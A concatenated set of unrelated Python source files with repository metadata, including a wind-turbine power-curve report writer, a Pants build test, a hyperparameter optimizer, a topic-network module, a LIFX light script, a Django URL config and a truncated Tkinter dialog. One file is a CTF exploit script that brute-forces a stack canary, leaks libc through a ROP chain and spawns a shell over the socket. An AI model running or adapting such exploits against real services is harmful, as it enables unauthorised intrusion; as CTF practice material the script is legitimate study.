sh.write(row+1, 1, analysis.powerCurveScatterMetric, self.percent_style)
if turbRenormActive:
sh.write(row, 2, "Scatter Metric After TI Renormalisation:", self.bold_style)
sh.write(row+1, 2, analysis.powerCurveScatterMetricAfterTiRenorm , self.percent_style)
return row + 3
class AnonReport(Report):
def __init__(self,targetPowerCurve,wind_bins, turbulence_bins, version="unknown"):
self.version = version
self.targetPowerCurve = targetPowerCurve
self.turbulenceBins = turbulence_bins
self.normalisedWindSpeedBins = wind_bins
def report(self, path, analysis, powerDeviationMatrix = True, scatterMetric=True):
self.analysis = analysis
book = xlwt.Workbook()
sh = book.add_sheet("Anonymous Report", cell_overwrite_ok=True)
sh.write(0, 0, "PCWG Tool Version Number:")
sh.write(0, 1, self.version)
sh.write(0, 2, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")'))
row = 1
if powerDeviationMatrix:
row = self.report_power_deviation_matrix(sh,analysis,book)
if scatterMetric:
row = self.report_scatter_metric(sh,analysis,row, analysis.turbRenormActive)
book.save(path)
def report_power_deviation_matrix(self,sh,analysis,book):
gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book)
pcStart = 2
pcEnd = pcStart + self.normalisedWindSpeedBins.numberOfBins + 5
deviationMatrixStart = pcEnd + 5
row= []
row.append( self.reportPowerCurve(sh, pcStart, 0, self.targetPowerCurve.name + ' Power Curve', self.targetPowerCurve) )
row.append( self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedHubPowerDeviations, gradient, "Hub Power"))
if analysis.normalisedTurbPowerDeviations != None:
deviationMatrixStart += (self.turbulenceBins.numberOfBins + 5) * 2
row.append(self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedTurbPowerDeviations, gradient, "Turb Corrected Power") )
return max(row)
def reportPowerDeviations(self,sh, startRow, powerDeviations, gradient, name):
countShift = self.turbulenceBins.numberOfBins + 5
sh.write(startRow, 1, "Deviations Matrix (%s)" % name, self.bold_style)
sh.write(startRow + countShift, 1, "Data Count Matrix (%s)" % name, self.bold_style)
for j in range(self.turbulenceBins.numberOfBins):
turbulence = self.turbulenceBins.binCenterByIndex(j)
row = startRow + self.turbulenceBins.numberOfBins - j
countRow = row + countShift
sh.write(row, 0, turbulence, self.percent_no_dp_style)
sh.write(countRow, 0, turbulence, self.percent_no_dp_style)
for i in range(self.normalisedWindSpeedBins.numberOfBins):
windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i)
col = i + 1
if j == 0:
sh.write(row + 1, col, windSpeed, self.two_dp_style)
sh.write(countRow + 1, col, windSpeed, self.two_dp_style)
if windSpeed in powerDeviations.matrix:
if turbulence in powerDeviations.matrix[windSpeed]:
deviation = powerDeviations.matrix[windSpeed][turbulence]
count = int(powerDeviations.count[windSpeed][turbulence])
if not np.isnan(deviation):
sh.write(row, col, deviation, gradient.getStyle(deviation))
sh.write(countRow, col, count, self.no_dp_style)
return startRow + self.turbulenceBins.numberOfBins + countShift
def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve):
sh.write(rowOffset, columnOffset + 2, name, self.bold_style)
rowOrders = { 'Data Count':4, 'Normalised Wind Speed':1,'Normalised Power':2, 'Turbulence':3}
for colname in rowOrders.keys():
sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style)
countRow = 1
for i in range(self.normalisedWindSpeedBins.numberOfBins):
windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i)
mask = self.analysis.dataFrame['Normalised WS Bin'] == windSpeed
dataCount = self.analysis.dataFrame[mask]['Normalised WS Bin'].count()
absoluteWindSpeed = windSpeed * self.analysis.observedRatedWindSpeed
sh.write(rowOffset + countRow + 1, columnOffset + 1, windSpeed, self.two_dp_style)
sh.write(rowOffset + countRow + 1, columnOffset + 4,
dataCount, self.no_dp_style)
if dataCount > 0:
sh.write(rowOffset + countRow + 1, columnOffset + 2,
float(powerCurve.powerFunction(absoluteWindSpeed))/self.analysis.observedRatedPower, self.two_dp_style)
sh.write(rowOffset + countRow + 1, columnOffset + 3,
float(powerCurve.turbulenceFunction(absoluteWindSpeed)), self.percent_no_dp_style)
countRow += 1
return countRow
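# Editorial sketch (not part of the original module): the style attributes used
# throughout (self.bold_style, self.two_dp_style, self.percent_no_dp_style, etc.)
# are defined elsewhere in the Report base class. They are typically created with
# xlwt.easyxf; the format strings below are plausible assumptions, not the
# project's exact definitions.
def _example_styles():
    import xlwt
    return {
        'bold_style': xlwt.easyxf('font: bold on'),
        'no_dp_style': xlwt.easyxf(num_format_str='0'),
        'one_dp_style': xlwt.easyxf(num_format_str='0.0'),
        'two_dp_style': xlwt.easyxf(num_format_str='0.00'),
        'four_dp_style': xlwt.easyxf(num_format_str='0.0000'),
        'percent_style': xlwt.easyxf(num_format_str='0.00%'),
        'percent_no_dp_style': xlwt.easyxf(num_format_str='0%'),
    }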
|
PCWG/PCWG
|
pcwg/reporting/reporting.py
|
reporting.py
|
py
| 47,780 |
python
|
en
|
code
| 23 |
github-code
|
6
|
26043118086
|
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.java.target_types import JavaSourcesGeneratorTarget
from pants.backend.java.target_types import rules as target_types_rules
from pants.core.util_rules import config_files, source_files
from pants.engine.addresses import Address, Addresses
from pants.jvm.resolve.common import Coordinate
from pants.jvm.resolve.coursier_fetch import NoCompatibleResolve
from pants.jvm.resolve.coursier_fetch import rules as coursier_fetch_rules
from pants.jvm.resolve.key import CoursierResolveKey
from pants.jvm.target_types import DeployJarTarget, JvmArtifactTarget
from pants.jvm.testutil import maybe_skip_jdk_test
from pants.jvm.util_rules import rules as util_rules
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner, engine_error
NAMED_RESOLVE_OPTIONS = (
'--jvm-resolves={"one": "coursier_resolve.lockfile", "two": "coursier_resolve.lockfile"}'
)
DEFAULT_RESOLVE_OPTION = "--jvm-default-resolve=one"
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*config_files.rules(),
*coursier_fetch_rules(),
*source_files.rules(),
*util_rules(),
*target_types_rules(),
QueryRule(CoursierResolveKey, (Addresses,)),
],
target_types=[DeployJarTarget, JavaSourcesGeneratorTarget, JvmArtifactTarget],
)
rule_runner.set_options(
args=[
NAMED_RESOLVE_OPTIONS,
DEFAULT_RESOLVE_OPTION,
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
return rule_runner
def assert_resolve(
expected_resolve: str,
rule_runner: RuleRunner,
root_one_resolve: str,
root_two_resolve: str,
leaf_resolve: str,
) -> None:
rule_runner.write_files(
{
"BUILD": dedent(
f"""\
deploy_jar(name='root_one', main='Ex', dependencies=[':leaf'], resolve='{root_one_resolve}')
deploy_jar(name='root_two', main='Ex', dependencies=[':leaf'], resolve='{root_two_resolve}')
jvm_artifact(
name='leaf',
group='ex',
artifact='ex',
version='0.0.0',
resolve='{leaf_resolve}',
)
"""
),
"coursier_resolve.lockfile": "[]",
}
)
resolve_key = rule_runner.request(
CoursierResolveKey,
# NB: Although it will not happen for `deploy_jars` in production, we resolve two of them
# together here to validate the handling of multiple roots, which _can_ happen for things
# like the `repl` goal, and other goals which create an adhoc merged Classpath.
[
Addresses(
[
Address(spec_path="", target_name="root_one"),
Address(spec_path="", target_name="root_two"),
]
)
],
)
assert resolve_key.name == expected_resolve
@maybe_skip_jdk_test
def test_all_matching(rule_runner: RuleRunner) -> None:
assert_resolve("one", rule_runner, "one", "one", "one")
@maybe_skip_jdk_test
def test_no_matching_for_root(rule_runner: RuleRunner) -> None:
with engine_error(NoCompatibleResolve):
assert_resolve("n/a", rule_runner, "one", "two", "two")
@maybe_skip_jdk_test
def test_no_matching_for_leaf(rule_runner: RuleRunner) -> None:
with engine_error(NoCompatibleResolve):
assert_resolve("n/a", rule_runner, "one", "one", "two")
@pytest.mark.parametrize(
"coord_str,expected",
(
("group:artifact:version", Coordinate("group", "artifact", "version")),
(
"group:artifact:packaging:version",
Coordinate("group", "artifact", "version", "packaging"),
),
(
"group:artifact:packaging:classifier:version",
Coordinate("group", "artifact", "version", "packaging", "classifier"),
),
),
)
def test_from_coord_str(coord_str: str, expected: Coordinate) -> None:
assert Coordinate.from_coord_str(coord_str) == expected
|
pantsbuild/pants
|
src/python/pants/jvm/resolve/coursier_fetch_test.py
|
coursier_fetch_test.py
|
py
| 4,186 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
70321394427
|
import multiprocessing as mp
from skopt import Optimizer
from skopt.space import Real, Integer
import subprocess
import time
import pickle
from ID_CNN_V01 import setup_thread_environment
from _utils.ID_utils import get_convolutions, Colors, check_available_gpus
n_calls = 7
dim_learning_rate = Real(low=1e-7, high=3e-2, prior='log-uniform', name='learning_rate')
dim_n_convolutions = Integer(low=1, high=3, name='n_convolutions')
dim_dense_nodes = Integer(low=128, high=200, name='n_dense_nodes')
class ParameterBatch:
"""
Container class for all hyperparameters needed to run the network.
"""
def __init__(self,
learning_rate=0.0005,
input_shape=[480, 640, 1],
batch_size=16,
convolutions=[(64, 7, 7), (128, 5, 5)],
gpu_id=2,
n_dense_nodes=128,
n_max_epochs=30,
n_runs=1,
training=True,
train_csv_file="_data/hetzell_shearlet_training_data.csv",
eval_csv_file="_data/hetzell_shearlet_evaluation_data.csv",
test_csv_file="_data/hetzell_shearlet_testing_data.csv"
):
self.learning_rate = learning_rate
self.input_shape = input_shape
self.batch_size = batch_size
self.convolutions = convolutions
self.gpu_id = gpu_id
self.n_dense_nodes = n_dense_nodes
self.n_max_epochs = n_max_epochs
self.n_runs = n_runs
self.training = training
self.train_csv_file = train_csv_file
self.test_csv_file = test_csv_file
self.eval_csv_file = eval_csv_file
def map_val_to_param_batch(vals, gpu_id):
"""
Maps the values given by an Optimizer into a ParameterBatch object.
:param vals: list of values from Optimizer
:param gpu_id: the gpu_id passed to the ParameterBatch
:return: ParameterBatch object
"""
params = ParameterBatch(learning_rate=vals[0],
convolutions=get_convolutions(vals[1]),
n_dense_nodes=vals[2],
gpu_id=gpu_id)
return params
def bayesian_optimize(n_calls=12):
"""
Apply Bayesian optimization to the network. Accesses the global variable reserved_gpus, asks the Optimizer for one point per GPU,
trains and evaluates at those points in parallelized worker processes, and repeats n_calls times. Then trains and tests the best setup.
:param n_calls: number of ask/tell optimization cycles to run
:return: ---
"""
start_time = time.time()
p = mp.Pool(len(reserved_gpus))
optimizer = Optimizer(dimensions=[dim_learning_rate, dim_n_convolutions, dim_dense_nodes],
random_state=1)
for i in range(1, n_calls + 1):
gpus = list(reserved_gpus)
vals = optimizer.ask(n_points=len(reserved_gpus))
points = []
for point in vals:
param_batch = map_val_to_param_batch(point, gpus.pop(0))
points.append(param_batch)
loss = p.map(setup_thread_environment, points)
optimizer.tell(vals, loss)
print("#" * 100)
print(Colors.OKBLUE, "Optimization cylce", i, "done.", Colors.ENDC)
print("#" * 100)
print("Best setup found:")
p.close()
print(min(optimizer.yi)) # print the best objective found
sorted_sets = sorted(list(zip(optimizer.yi, optimizer.Xi)), key=lambda tup: tup[0])
print("BEST SET:", sorted_sets[0])
print("#" * 100)
print(Colors.OKBLUE, "Starting Testing of Best Set.", Colors.ENDC)
print("#" * 100)
gpus = list(reserved_gpus)
test_args = map_val_to_param_batch(sorted_sets[0][1], gpus.pop(0))
test_args.training = False
avg_test_accuracy = setup_thread_environment(test_args)
print("Test accuracy:", avg_test_accuracy)
end_time = time.time()
print("It took:", str(end_time - start_time), "seconds")
pickle.dump(sorted_sets, open("_logs/optimizer_points.pkl", "wb"))
try:
file_path = "_logs/dl_optimizer_result.txt"
label_file = open(file_path, "w")
label_file.write("Best setup found:\n")
label_file.write(str(sorted_sets[0]))
label_file.write("\nTime to process: ")
label_file.write(str(end_time - start_time))
label_file.write("\nTest Accuracy: ")
label_file.write(str(avg_test_accuracy))
finally:
label_file.close()
def main():
"""
clears the logdir, finds the reserved_gpus and starts the bayesian optimization.
:return: ---
"""
global reserved_gpus
command_str = "(rm -r _logs)"
subprocess.run(command_str, shell=True)
reserved_gpus = check_available_gpus()
print("GPUs", reserved_gpus, "are available.")
bayesian_optimize(n_calls=n_calls)
if __name__ == "__main__":
main()
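# Editorial sketch (not part of the original script): the bare skopt ask/tell
# pattern that bayesian_optimize() builds on, shown in isolation with a toy
# objective. The dimension and objective below are illustrative assumptions.
def _ask_tell_demo():
    opt = Optimizer(dimensions=[Real(low=-2.0, high=2.0, name='x')], random_state=1)
    for _ in range(10):
        points = opt.ask(n_points=2)                    # one candidate per worker
        losses = [(p[0] - 0.5) ** 2 for p in points]    # evaluate the candidates
        opt.tell(points, losses)                        # feed results back
    return min(opt.yi)                                  # best loss observed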
|
lorenz-h/DataRepresentationLearning
|
Old Experiments/ImitationDuckie_V1/_old_versions/ID_Optimizer.py
|
ID_Optimizer.py
|
py
| 4,792 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22176331977
|
import networkx as nx
from networkx.algorithms import community
from nltk.corpus import stopwords
import re
def build_graph(text):
word_list = []
G = nx.Graph()
for line in text:
line = (line.strip()).split()
for i, word in enumerate(line):
if i != len(line)-1:
word_a = word
word_b = line[i+1]
if word_a not in word_list:
word_list.append(word_a)
if word_b not in word_list:
word_list.append(word_b)
if G.has_edge(word_a,word_b):
G[word_a][word_b]['weight'] += 1
else:
G.add_edge(word_a,word_b, weight = 1)
return G
def calculate_central_nodes(text_network):
bc = (nx.betweenness_centrality(text_network,weight='weight'))
nx.set_node_attributes(text_network, bc, 'betweenness')
bc_threshold = sorted(bc.values(), reverse=True)[20]
to_keep = [n for n in bc if bc[n] > bc_threshold]
filtered_network = text_network.subgraph(to_keep)
return filtered_network
def create_and_assign_communities(text_network):
communities_generator = community.girvan_newman(text_network)
top_level_communities = next(communities_generator)
next_level_communities = next(communities_generator)
return next_level_communities
def find_topics(text):
try:
text_network = build_graph(text)
text_network = calculate_central_nodes(text_network)
topics = create_and_assign_communities(text_network)
return topics
except:
print("Error: Something went wrong. Check your input. You need at least 20 unique words in your text to start the analysis.")
def clean(text):
new_text = []
no_punct = [re.sub(r'[^\w\s]','',x) for x in text]
stop_words = set(stopwords.words('english'))
for line in no_punct:
new_line = ([item.lower() for item in line.split() if not item.lower() in stop_words])
new_text.append(' '.join((new_line)))
return new_text
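# Editorial usage sketch (not part of the original package): the sample sentences
# below are illustrative only, and real inputs should be longer -- find_topics()
# needs well over 20 unique non-stopword tokens to work reliably. Assumes the
# NLTK 'stopwords' corpus has been downloaded.
def _demo():
    sample = [
        "the quick brown fox jumps over the lazy dog near the quiet river bank",
        "a hungry fox chases a small rabbit across the green river valley at dawn",
        "the lazy dog sleeps beside the river while the fox watches the rabbit swim",
    ]
    cleaned = clean(sample)        # lowercase, strip punctuation and stopwords
    topics = find_topics(cleaned)  # communities of central words, or None on failure
    if topics:
        for i, topic in enumerate(topics):
            print("Topic %d: %s" % (i + 1, ", ".join(sorted(topic))))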
|
michal-pikusa/topic-network
|
topicnetwork/__init__.py
|
__init__.py
|
py
| 2,066 |
python
|
en
|
code
| 1 |
github-code
|
6
|
70820187389
|
from lifxlan import *
import subprocess
import random
import sys  # used by parse_arg(sys.argv) below; not provided by the wildcard import
lights_name = {
"lit" : "Lit_haut",
"couloir" : "Couloir",
"wc" : "Wc",
"cuisine" : "Cuisine"
}
colors = {
"rouge" : [65535, 65535, 65535, 3500],
"orange" : [5525, 65535, 65535, 3500],
"jaune" : [7000, 65535, 65535, 3500],
"vert" : [16173, 65535, 65535, 3500],
"cyan" : [29814, 65535, 65535, 3500],
"bleu" : [43634, 65535, 65535, 3500],
"violet" : [50486, 65535, 65535, 3500],
"rose" : [58275, 65535, 47142, 3500],
"blanc" : [58275, 0, 65535, 5500],
"blanc froid" : [58275, 0, 65535, 9000],
"blanc chaud" : [58275, 0, 65535, 3200],
"or" : [58275, 0, 65535, 2500],
"aleatoire" : 1
}
light=None
power_level=None
color=None
lan = LifxLAN(None)
_lights = lan.get_lights()
lights = {}
for l in _lights:
lights[l.get_label()] = l
def command(light, color, power_level):
if color is not None and power_level is not None:
color = set_power(color, power_level)
if light is not None:
if color is None and power_level is not None:
color = set_power(light.get_color(), power_level)
elif color is not None and power_level is None:
color = set_power(color, light.get_power())
elif color is None and power_level is None:
color = set_power(None, 100)
light.set_color(color, duration=0.2, rapid=False)
def set_power(color, power_level):
if color == None:
color = [58275, 0, 0, 9000]
if type(color) is not list:
color = list(color)
if power_level <= 100:
color[2] = 65535 * power_level / 100
else:
color[2] = power_level
return color
def jarvis_say(rules):
color = None
says = "J\'allume la lumiere "
if "light" in rules:
says += " de la %s " % rules["light"]
if "color" in rules:
if rules["color"] == "aleatoire":
color = random.choice(list(colors.keys()))
says += " avec une couleur aleatoire qui sera %s" % color
color = colors[color]
else:
says += " en %s " % rules["color"]
if "power" in rules:
if rules["power"] == "0":
says = says.replace("J\'allume", "J\'eteint")
lan.set_power_all_lights("off", rapid=True)
else:
lan.set_power_all_lights("on", rapid=True)
says += " avec une intensite de %s pourcents" % rules["power"]
p = subprocess.Popen(['/etc/script/jarvis/jarvis.sh', '-s', says], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return color
def parse_arg(args):
light = None
color = None
power_level = None
rules = {}
for i, arg in enumerate(args):
if i + 1 < len(args) and arg + " " + args[i + 1] in lights_name:
light = lights[arg + " " + args[i + 1]]
rules["light"] = arg + " " + args[i + 1]
elif arg in lights_name:
rules["light"] = arg
light = lights[lights_name[arg]]
elif i + 1 < len(args) and arg + " " + args[i + 1] in colors:
rules["color"] = arg + " " + args[i + 1]
color = colors[arg + " " + args[i + 1]]
elif arg in colors:
rules["color"] = arg
color = colors[arg]
else:
try:
power_level = int(arg)
rules["power"] = arg
except:
pass
tmp = jarvis_say(rules)
if tmp != None:
color = tmp
return light, color, power_level
light, color, power_level = parse_arg(sys.argv)
if light is not None:
command(light, color, power_level)
else:
for light_name in lights:
command(lights[light_name], color, power_level)
|
devauxa/harriette
|
script/light.py
|
light.py
|
py
| 3,774 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42162211409
|
"""tilltheend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from forever import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('login', views.login_request, name='login'),
path('logout', views.logout_request, name='logout'),
path('register', views.register, name='register'),
path('', views.index, name='home'),
path('todo', views.todoadd, name='todo'),
path('translate', views.translate, name='translate'),
path('texttospech', views.texttospech, name='texttospech'),
path('qrcode', views.qrcode, name='qrcode'),
path('weather', views.weather, name='weather'),
path('download', views.download_video, name='download'),
path('delete/<int:id>', views.delete, name='delete'),
path('doing/<int:id>', views.doing, name='doing'),
path('finish/<int:id>', views.finish, name='finish'),
path('history/<int:id>', views.history, name='history'),
path('news', views.news, name='news'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
king9799/7-1-projects
|
forever/urls.py
|
urls.py
|
py
| 1,695 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32284951119
|
#!/usr/bin/env python
from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py
bin_file = './streaming'
context(os = 'linux', arch = 'amd64')
# context.log_level = 'debug'
#==========
env = Environment('debug', 'local', 'remote')
env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET')
env.set_item('target', debug = {'argv':[bin_file], 'aslr':False}, \
local = {'argv':[bin_file]}, \
remote = {'host':'localhost', 'port':8000})
env.select('remote')
#==========
binf = ELF(bin_file)
addr_send_message = binf.sep_function['send_message']
addr_csu_init = binf.sep_function['__libc_csu_init']
addr_got_main = binf.got['__libc_start_main']
addr_got_read = binf.got['read']
addr_got_write = binf.got['write']
addr_bss = binf.sep_section['.bss']
addr_csu_init_1st = addr_csu_init + 0x5a
addr_csu_init_2nd = addr_csu_init + 0x40
addr_buf = addr_bss + 0x900
addr_buf2 = addr_bss + 0xe00
libc = binf.libc
offset_libc_main = libc.sep_function['__libc_start_main']
path = './music/'
name = 'a'
offset = 0x1b8
#==========
def attack(conn):
canary = 0x44288b3fb3615500
#canary = detect_canary(env)
info('canary = 0x{:08x}'.format(canary))
put_mulmusic(canary)
libc.address = detect_libc_base(conn)
addr_libc_str_sh = libc.search('/bin/sh').next()
info('addr_libc_base = 0x{:08x}'.format(libc.address))
shell = raw_input('shell?(Y/n)')[0] != 'n'
rop = ROP(libc)
if shell:
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(addr_libc_str_sh)
#rop.execve(addr_libc_str_sh, 0, 0)
else:
message = '192.168.115.1'.ljust(0x10, '\x00')
message += 'test\x00'
rop.read(4, addr_buf2, len(message))
for i in range(0x10):
rop.call(addr_send_message, [addr_buf2, 4296, addr_buf2+0x10])
exploit = p64(0xdeadbeef)
exploit += str(rop)
conn.send(exploit)
if not shell:
sleep(0.1)
conn.send(message)
def put_mulmusic(canary):
rop = ROP(binf)
exploit = 'a'*offset
exploit += p64(canary)
exploit += '\x00'*0x10
exploit += p64(0xdeadbeef)
exploit += p64(addr_csu_init_1st)
exploit += p64(0) # rbx
exploit += p64(1) # rbp
exploit += p64(addr_got_write) # r12
exploit += p64(8) # r13
exploit += p64(addr_got_main) # r14
exploit += p64(4) # r15
exploit += p64(addr_csu_init_2nd)
exploit += p64(0xdeadbeef)
exploit += p64(0) # rbx
exploit += p64(1) # rbp
exploit += p64(addr_got_read) # r12
exploit += p64(0x10000) # r13
exploit += p64(addr_buf) # r14
exploit += p64(4) # r15
exploit += p64(addr_csu_init_2nd)
exploit += p64(0xdeadbeef)
exploit += p64(0) # rbx
exploit += p64(addr_buf) # rbp
exploit += p64(0) # r12
exploit += p64(0) # r13
exploit += p64(0) # r14
exploit += p64(4) # r15
exploit += p64(rop.leave.address)
upload_file(name, exploit)
def detect_libc_base(conn):
conn.send('\x80')
conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36))
conn.sendafter('\x11'+p32(0x40), ''.ljust(64))
conn.sendafter('\x20'+p32(0), '\x84')
conn.sendafter('\x14'+p32(8), p64(0x3ff))
addr_libc_main = u64(conn.recv(8))
addr_libc_base = addr_libc_main - offset_libc_main
return addr_libc_base
def detect_canary(env):
log = context.log_level
context.log_level = 100
canary = '\x00'
while len(canary) < 8:
exploit = 'a'*offset
exploit += ''.join([canary+chr(i) for i in range(0x100)])
upload_file(name, exploit)
for i in range(0, 0x100):
conn = communicate(env.mode, **env.target)
conn.send('\x80')
conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36))
conn.sendafter('\x11'+p32(0x40), ''.ljust(64))
conn.sendafter('\x20'+p32(0), '\x83')
conn.sendafter('\x13'+p32(8), p64((len(canary)+1)*i))
conn.sendafter('\x23', '\x84')
conn.sendafter('\x14'+p32(8), p64(offset+len(canary)+1))
try:
conn.recv()
except:
found = False
else:
found = True
finally:
conn.close()
if found :
context.log_level = log
info('canary found : 0x%02x' % i)
context.log_level = 100
canary += chr(i)
break
context.log_level = log
return u64(canary)
def upload_file(name, data):
open(path+name, "wb").write(data)
#=========
if __name__=='__main__':
conn = communicate(env.mode, **env.target)
attack(conn)
conn.interactive()
#==========
|
shift-crops/CTFProblemArchive
|
2017/SECCON Finals/Domestic/fuchu/streaming/exploit.py
|
exploit.py
|
py
| 5,229 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27099804006
|
from grid_box import GridBox
class PortfolioDialog:
def getInitialFileName(self):
return "portfolio"
def getInitialFolder(self):
return preferences.portfolio_last_opened_dir()
def addFormElements(self, master):
self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), self.config.description)
#Items
label = Label(master, text="Portfolio Items:")
label.grid(row=self.row, sticky=W, column=self.titleColumn, columnspan = 2)
self.row += 1
self.itemsListBoxEntry = self.addListBox(master, "Items ListBox", height = 10)
self.validateItems = ValidatePortfolioItems(master, self.itemsListBoxEntry.listbox)
self.validations.append(self.validateItems)
self.validateItems.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn)
headers = ["Description","Diameter","HubHeight","RatedPower","CutOutWindSpeed","Datasets"]
self.items_grid_box = GridBox(master, headers)
self.items_grid_box.edit = self.edit_item
if not self.isNew:
for item in self.config.items:
self.items_grid_box.add_item(item)
self.validateItems.validate()
def setConfigValues(self):
self.config.path = self.filePath.get()
self.config.description = self.description.get()
#items
self.config.items = []
for i in range(self.itemsListBoxEntry.listbox.size()):
if i > 0:
values = extractPortfolioItemValuesFromText(self.itemsListBoxEntry.listbox.get(i))
self.config.addItem(description = values[0], \
diameter = values[1], \
hubHeight = values[2], \
ratedPower = values[3], \
cutOutWindSpeed = values[4], \
datasets = values[5])
def new_item(self):
PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText)
self.validateItems.validate()
def edit_item(self, event = None):
items = self.itemsListBoxEntry.listbox.curselection()
if len(items) == 1:
idx = int(items[0])
if idx > 0:
text = self.itemsListBoxEntry.listbox.get(items[0])
try:
PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText, text, idx)
except ExceptionType as e:
self.status.addMessage("ERROR loading config (%s): %s" % (text, e))
def remove_item(self):
items = self.itemsListBoxEntry.listbox.curselection()
pos = 0
for i in items:
idx = int(i) - pos
if idx > 0:
self.itemsListBoxEntry.listbox.delete(idx, idx)
pos += 1
self.validateItems.validate()
def addPortfolioItemFromText(self, text, index = None):
if index != None:
self.itemsListBoxEntry.listbox.delete(index, index)
self.itemsListBoxEntry.listbox.insert(index, text)
else:
self.itemsListBoxEntry.listbox.insert(END, text)
class PortfolioItemDialog(BaseDialog):
def __init__(self, master, relativePath, status, callback, text = None, index = None):
self.relativePath = relativePath
self.callback = callback
self.text = text
self.index = index
self.callback = callback
self.isNew = (text == None)
BaseDialog.__init__(self, master, status)
def body(self, master):
self.prepareColumns(master)
#dummy label to force width
Label(master, text=" " * 275).grid(row = self.row, sticky=W, column=self.titleColumn, columnspan = 8)
self.row += 1
if not self.isNew:
items = extractPortfolioItemValuesFromText(self.text)
description = items[0]
diameter = items[1]
hubHeight = items[2]
ratedPower = items[3]
cutOutWindSpeed = items[4]
datasets = items[5]
else:
description = None
diameter = None
hubHeight = None
ratedPower = None
cutOutWindSpeed = None
datasets = None
self.addTitleRow(master, "Portfolio Item Settings:")
self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), description)
self.diameter = self.addEntry(master, "Diameter:", ValidateNonNegativeFloat(master), diameter)
self.hubHeight = self.addEntry(master, "Hub Height:", ValidateNonNegativeFloat(master), hubHeight)
self.ratedPower = self.addEntry(master, "Rated Power:", ValidateNonNegativeFloat(master), ratedPower)
self.cutOutWindSpeed = self.addEntry(master, "Cut Out Wind Speed:", ValidateNonNegativeFloat(master), cutOutWindSpeed)
self.datasetsListBoxEntry = self.addListBox(master, "Datasets ListBox")
if not self.isNew:
for dataset in datasets:
self.datasetsListBoxEntry.listbox.insert(END, dataset)
self.datasetsListBoxEntry.listbox.grid(row=self.row, sticky=W+E+N+S, column=self.labelColumn, columnspan=2)
self.validateDatasets = ValidateDatasets(master, self.datasetsListBoxEntry.listbox)
self.validations.append(self.validateDatasets)
self.validateDatasets.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn)
self.newDatasetButton = Button(master, text="New", command = self.NewDataset, width=5, height=1)
self.newDatasetButton.grid(row=self.row, sticky=E+N, column=self.secondButtonColumn)
self.editDatasetButton = Button(master, text="Edit", command = self.EditDataset, width=5, height=1)
self.datasetsListBoxEntry.listbox.bind("<Double-Button-1>", self.EditDataset)
self.editDatasetButton.grid(row=self.row, sticky=E+S, column=self.secondButtonColumn)
self.addDatasetButton = Button(master, text="+", command = self.addDataset, width=2, height=1)
self.addDatasetButton.grid(row=self.row, sticky=E+N, column=self.buttonColumn)
self.removeDatasetButton = Button(master, text="-", command = self.removeDatasets, width=2, height=1)
self.removeDatasetButton.grid(row=self.row, sticky=E+S, column=self.buttonColumn)
#dummy label to indent controls
Label(master, text=" " * 5).grid(row = (self.row-1), sticky=W, column=self.titleColumn)
def apply(self):
datasets = []
for i in range(self.datasetsListBoxEntry.listbox.size()):
dataset = self.relativePath.convertToRelativePath(self.datasetsListBoxEntry.listbox.get(i))
datasets.append(dataset)
self.text = encodePortfolioItemValuesAsText(self.description.get().strip(), \
self.diameter.get(), \
self.hubHeight.get(), \
self.ratedPower.get(), \
self.cutOutWindSpeed.get(), \
datasets)
if self.isNew:
self.status.addMessage("Portfolio Item created")
else:
self.status.addMessage("Portfolio Item updated")
if self.index== None:
self.callback(self.text)
else:
self.callback(self.text, self.index)
def EditDataset(self, event = None):
items = self.datasetsListBoxEntry.listbox.curselection()
if len(items) == 1:
index = items[0]
path = self.datasetsListBoxEntry.listbox.get(index)
try:
datasetConfig = configuration.DatasetConfiguration(self.relativePath.convertToAbsolutePath(path))
DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, datasetConfig, index)
except ExceptionType as e:
self.status.addMessage("ERROR loading config (%s): %s" % (path, e))
def NewDataset(self):
try:
config = configuration.DatasetConfiguration()
DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, config)
except ExceptionType as e:
self.status.addMessage("ERROR creating dataset config: %s" % e)
def addDataset(self):
